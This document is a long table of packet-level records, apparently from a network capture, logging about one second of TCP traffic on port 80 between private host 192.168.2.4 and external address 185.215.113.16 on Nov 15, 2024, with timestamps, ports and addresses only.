Nov 15, 2024 14:09:34.697601080 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.697618961 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.698218107 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.698230028 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.698239088 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.698249102 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.698257923 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.698266029 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.698282003 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.698295116 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.698401928 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.698412895 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.698421955 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.698429108 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.698438883 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.698482037 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.698510885 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.698999882 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.699155092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.699166059 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.699176073 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.699215889 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.699234962 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.699253082 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.699265957 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.699304104 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.699796915 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.699846029 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.741144896 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.741202116 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.741213083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.741316080 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.771462917 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771476984 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771487951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771500111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771511078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771522045 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771584988 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.771625042 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.771810055 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771822929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771835089 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771846056 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771857977 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771866083 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.771871090 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.771883965 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.771900892 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.771929026 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.810384989 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810405016 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810415030 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810458899 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.810478926 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.810657978 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810672998 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810683012 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810693026 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810703993 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.810714960 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.810740948 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.810765982 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810776949 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810853004 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.810926914 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810937881 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.810982943 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.811023951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811048031 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811095953 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.811141968 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811151981 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811189890 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.811234951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811244965 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811284065 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.811408997 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811427116 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811438084 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811455965 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.811480999 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.811641932 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811651945 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811661959 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811672926 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.811692953 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.811709881 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812002897 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812012911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812022924 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812032938 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812043905 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812052965 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812052965 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812067032 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812071085 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812093019 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812105894 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812257051 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812267065 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812277079 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812287092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812297106 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812303066 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812309980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812320948 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812330008 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812340021 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812352896 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812696934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812707901 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812717915 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812727928 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812737942 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812745094 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812747955 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812761068 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.812769890 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812779903 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.812798977 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.813184977 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.813230991 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.813296080 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.813308001 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.813339949 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.813349009 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.813349009 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.813360929 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.813371897 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.813397884 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.813419104 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.815293074 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815346003 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815360069 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815366030 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.815386057 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.815407991 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.815493107 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815504074 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815514088 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815524101 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815550089 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.815576077 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.815790892 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815803051 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815812111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815823078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815833092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.815840006 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.815859079 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.815871954 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.816091061 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.816109896 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.816118956 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.816128969 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.816139936 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.816154957 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.816171885 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.816380024 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.816390038 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.816399097 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.816432953 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.816447973 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.858474970 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.858488083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.858498096 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.858534098 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.858571053 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.889107943 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889118910 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889128923 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889173985 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.889187098 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889197111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889200926 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.889209032 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889220953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889226913 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.889242887 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.889266968 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.889558077 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889571905 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889584064 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889595032 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889605999 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.889606953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.889625072 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.889652014 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.927722931 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.927880049 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.927967072 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.928131104 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928143024 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928153038 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928163052 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928180933 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.928198099 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.928486109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928497076 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928502083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928512096 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928520918 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928534985 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.928544044 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928550005 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.928558111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.928560972 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.928605080 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.928930998 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929088116 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929097891 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929109097 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929119110 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929133892 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929136992 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.929145098 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929152966 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.929157019 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929167986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929167032 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.929183960 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929191113 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.929214001 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.929234982 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.929886103 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929897070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929905891 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929924011 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929934978 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929939032 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.929946899 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929958105 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929965973 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.929969072 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929980993 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.929982901 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.929991961 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930003881 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930010080 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.930035114 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.930047989 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.930558920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930569887 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930607080 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.930684090 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930696964 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930707932 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930717945 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930727005 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930732012 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.930742025 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.930743933 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930759907 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930769920 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930773020 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.930782080 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.930795908 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.930807114 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.930830002 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.931505919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931515932 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931528091 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931550980 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931560993 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.931561947 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931575060 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931583881 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.931585073 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931596041 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931607962 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931608915 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.931617975 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931628942 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.931632042 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.931646109 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.931665897 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.932501078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932514906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932523012 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932533026 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932538986 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932549953 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932559967 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.932564020 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932575941 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932581902 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.932586908 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932599068 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932610035 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932615995 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.932634115 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.932634115 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.932666063 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.932677984 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.933320999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.933334112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.933343887 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.933353901 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.933363914 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.933374882 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.933403015 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.933413982 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.975821972 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.975843906 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.975855112 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:34.975939035 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:34.975939035 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.006330013 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.006365061 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.006388903 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.006400108 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.006407022 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.006417990 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.006429911 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.006429911 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.006445885 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.006449938 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.006474972 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.006495953 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.007149935 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.007162094 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.007170916 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.007200003 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.007225037 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.007282972 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.007318974 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.007332087 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.007378101 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.007713079 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.007725954 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.007770061 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.045636892 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.045650005 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.045660973 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.045710087 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.045725107 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:35.045808077 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.045826912 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:35.045838118 CET	80	49761	185.215.113.16	192.168.2.4
